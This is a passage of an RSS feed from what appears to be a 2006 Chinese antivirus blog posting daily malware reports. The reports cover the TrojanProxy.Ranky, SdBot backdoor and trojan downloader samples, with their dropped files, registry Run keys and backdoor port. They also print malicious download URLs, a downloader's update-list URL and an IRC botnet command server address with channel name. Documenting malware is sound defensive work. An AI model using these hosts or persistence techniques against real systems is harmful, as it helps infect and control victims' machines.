href="http://www.nonameforthisdomain.com/data.asp?rnd">http://www.nonameforthisdomain.com/data.asp?rnd</A>=[随机数]&#038;antisp=1<BR>当前下载列表的内容如下：<BR><A href="http://content.dollarrevenue.com/keyboard5.exe">http://content.dollarrevenue.com/keyboard5.exe</A>，就是keyboard5.exe本身<BR><A href="http://content.dollarrevenue.com/mousepad5.exe">http://content.dollarrevenue.com/mousepad5.exe</A>，一个广告点击程序，可能弹出广告窗口<BR><A href="http://content.dollarrevenue.com/newname5.exe">http://content.dollarrevenue.com/newname5.exe</A>，木马下载器<BR></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L023814C039B10F4E title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L023815403BE92491><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L023815803E213A14 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">dpnss32.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L023815C040594FD7 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanProxy.Ranky</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L023816404291661A title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>病毒运行后，将创建下列文件：<BR>%SystemDir%\dpnss32.exe, 21257字节<BR>在注册表中添加下列启动项：<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;Microsoft (R) Windows Data Execution Prevention Service&#8221; = %SystemDir%\dpnss32.exe<BR>这样，在Windows启动时，病毒就可以自动执行。<BR></DIV><br />
<DIV>开启后门代理端口TCP 7328, 黑客可以远程使用这些代理端口，将被感染计算机作为跳板（代理），进行黑客活动。</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV></TD></TR></TBODY></TABLE></SPAN></P><!--AD_Link_Data_Begin-->
<p align="center"><span style="font-size: 0.8em">本篇文章使用<a href="http://www.aigaogao.com/blogeditor/index.html" target="_blank">aigaogao</a> Blog软件发布, <a href="http://www.aigaogao.com/blogeditor/download.html" target="_blank">“我的Blog要备份”</a></span></p>
<p><!--AD_Link_Data_End--></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.donews.com/daishuo/archive/2006/03/24/790367.aspx/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>昨日病毒(2006.03.22)</title>
		<link>http://blog.donews.com/daishuo/archive/2006/03/24/790364.aspx</link>
		<comments>http://blog.donews.com/daishuo/archive/2006/03/24/790364.aspx#comments</comments>
		<pubDate>Fri, 24 Mar 2006 05:03:00 +0000</pubDate>
		<dc:creator>daishuo</dc:creator>
				<category><![CDATA[1.反病毒]]></category>

		<guid isPermaLink="false">http://blog.donews.com/daishuo/archive/2006/03/24/790364.aspx</guid>
		<description><![CDATA[3月22日上报次数较多的样本有： 
313.exe -------- 175； 
iplus.exe -------- 94； 
请进入全文查看它们的分析报告。]]></description>
			<content:encoded><![CDATA[<p><P><SPAN> <br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 562px" width=562></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 41px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width=562><br />
<DIV><STRONG><FONT face=Arial>昨日病毒</FONT></STRONG></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 31px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 146px" width=146><br />
<COL style="WIDTH: 149px" width=149></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=146><br />
<DIV><FONT face=Arial><STRONG>统计时段</STRONG></FONT></DIV></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=149><br />
<DIV><FONT face=宋体><br />
<DIV title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><SPAN id=L025D04E004BA05E6 style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-3-22</SPAN><SPAN style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></SPAN></DIV></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 555px" width=555></COLGROUP><br />
<TBODY><br />
<TR><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><br />
<DIV><STRONG><FONT face=Arial>病毒样本上报数排行</FONT></STRONG></DIV><br />
<DIV><STRONG><FONT face=Arial></FONT></STRONG> </DIV><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 165px" width=165></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 22px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=229><br />
<DIV align=center><FONT face=Arial>样本文件名</FONT></DIV></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=165><br />
<DIV align=center><FONT face=Arial>上报次数</FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR></TBODY><br />
<TBODY><br />
<TR id=L025D06A007170C89><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L025D0720097413AC title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">313.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L025D07600BD11B0F title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">175</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L025DC0401C5D0CC4><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L025DC0C01EBACD87 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">iplus.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L025DC10021188E8A title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">94</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 118px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><br />
<DIV><FONT face=Arial><STRONG>技术分析</STRONG></FONT></DIV><SPAN><SPAN id=L025D08200E2E2332 title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L025D08A0108B2BD5><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L025D08E012E834B8 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">313.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L025D092015453DDB title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/SdBot.cxe</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L025D09A017A2477E title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>1、病毒运行后，将创建下列文件：<BR>%SystemDir%\313.exe, 82709字节<BR>在注册表中添加下列启动项：<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;Microsoft System&#8221; = 313.exe<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<BR>&#8220;Microsoft System&#8221; = 313.exe<BR>[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;Microsoft System&#8221; = 313.exe<BR>[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<BR>&#8220;Microsoft System&#8221; = 313.exe<BR>这样，在Windows启动时，病毒就可以自动执行。</DIV><br />
<DIV> </DIV><br />
<DIV>2、利用多种系统漏洞进行传播。会扫描局域网内存在漏洞的计算机，发送大量数据包，可以造成局域网拥堵甚至瘫痪。<BR> <BR>3、连接irc服务器221.2.51.204:65146，接收黑客命令。<BR>botnet:<BR>221.2.51.204:65146 <BR>#google g00gle</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L0301804028D53F53 title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L030180C02BD6C016><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L030181002ED84119 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">iplus.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L0301814031D9C25C title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L030181C034DB441F title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>一个下载器，运行后首先从<A href="http://www.yeacool.net/update/update.txt">http://www.yeacool.net/update/update.txt</A>得到要下载的程序列表，然后下载并运行列表上的网络程序。会安装播霸、Vika阅读器、快搜IE插件等。</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV></TD></TR></TBODY></TABLE></SPAN></P><!--AD_Link_Data_Begin-->
<p align="center"><span style="font-size: 0.8em">本篇文章使用<a href="http://www.aigaogao.com/blogeditor/index.html" target="_blank">aigaogao</a> Blog软件发布, <a href="http://www.aigaogao.com/blogeditor/download.html" target="_blank">“我的Blog要备份”</a></span></p>
<p><!--AD_Link_Data_End--></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.donews.com/daishuo/archive/2006/03/24/790364.aspx/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>昨日病毒(2006.03.20)</title>
